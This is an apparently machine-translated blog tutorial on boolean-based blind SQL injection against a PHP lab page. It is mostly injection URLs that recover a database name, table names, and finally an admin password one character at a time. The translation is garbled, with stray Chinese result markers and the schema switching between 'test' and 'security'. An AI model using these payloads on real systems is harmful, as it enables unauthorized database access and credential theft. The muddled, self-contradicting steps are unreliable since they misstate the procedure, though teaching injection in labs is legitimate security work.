Blinds then we come to understand that blind syntax
There is a syntax description
https://blog.csdn.net/alex_seo/article/details/82148955
0X01 first step to determine the length of the current database
Syntactic constructs
/index.php?id= . 1 % 20and% 20length (( SELECT % 20database ()))% correct 3E3
index.php?id=1 and length((select database()))>4 错误
We determined that the database name is not greater than 3 more than 4 then the database is the length of 4
0X02 explosion database name
HTTP: // www.php-sqli.net/index.php?id=1%20and%20ascii(substr((select%20database()),1,1))%3E1 correct
?id=1 and ascii(substr((select database()),1,1))>100 真确
id=1 and ascii(substr((select database()),1,1))>115正确
?id=1 and ascii(substr((select database()),1,1))>116 错误
Then we get a first position data of the database is ascii 116 => t
The second explosion continues
?id=1 and ascii(substr((select database()),2,1))>100 正确
?id=1 and ascii(substr((select database()),2,1))>101 错误
Then the second letter is 101 => e
A third explosion continues
?id=1 and ascii(substr((select database()),3,1))>114 正确 ?id=1 and ascii(substr((select database()),3,1))>115 错误
The third letter 115 => s
the fourth
?id=1 and ascii(substr((select database()),4,1))>115 真确 ?id=1 and ascii(substr((select database()),4,1))>116 错误
The fourth => 116 t
Then we should be the name of the database test
0X02 burst table name
First determine how many tables
Here I do not know grammar
Then the length of the first table
id=1 and length((select table_name from information_schema.tables where table_schema='test' limit 0,1))>4
Here you can see right
id=1 and length((select table_name from information_schema.tables where table_schema='test' limit 0,1))>5 错误
Then the length of the first table 4
The first letter of the table name first burst table
?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>1 正确
?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100 正确
?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101 错误
So here we know the first name of the mother of the table is 101 => e
The second letter blasting
?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1))>108 正确
?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1))>109 错误
Then the second letter => 109 m
Burst to burst here is not about email
We started blasting the second table
?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1))>100 正确
id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1))>114 错误
id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1))>113 正确
The first letter is 114 => r
Admin does not want
Third table
id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 2,1),1,1))>116 正确
id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 2,1),1,1))>117 错误
The first letter 117 => u
This certainly is not much bb users table the blinds too tired direct burst column name
FML library name is I want to write security test wrong special wrong
0X03 burst column names
Operation and blasting operation is the same as the table name
Here we are blasting out the username and password
0X04 burst fields
password
ascii(substr((select password from admin limit 0,1),1,1))>1
We check in to check the contents of our admin password password listed in the table inside inside